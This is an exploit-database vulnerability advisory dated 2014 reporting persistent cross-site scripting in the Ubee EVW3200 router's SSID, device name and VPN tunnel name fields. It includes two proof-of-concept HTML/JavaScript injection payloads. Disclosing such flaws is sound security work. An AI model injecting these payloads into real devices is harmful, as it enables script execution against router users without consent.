Ubee EVW3200 - Multiple Persistent Cross Site Scripting Vulnerability

2014-03-13
ID: 21765
CVE: None
Download vulnerable application: None
# Exploit Title: Ubee EVW3200 - Multiple Persistent Cross Site Scripting
  # Google Dork: N/A
  # Date: 02-03-2014
  # Exploit Author: Jeroen - IT Nerdbox
  # Vendor Homepage: http://www.ubeeinteractive.com/
  # Software Link:
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20
  # Version: All
  # Tested on: N/A
  # CVE : N/A
  #
  ## Description:
  #
  # The SSID and Device name settings in the wireless configuration do not
sanitize their input.
  #
  # The VPN Tunnel name is also vulnerable for persistent XSS
  #
  ## PoC:
  #
  #   Entering the following payload in one of these fields will execute
javascript:
  #
  #  "><input onmouseover=prompt(1)>  or "><button
onclick=prompt(1)>XSS</button>
  #
  #
  # More information can be found at:
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/
1-4-2 (www02)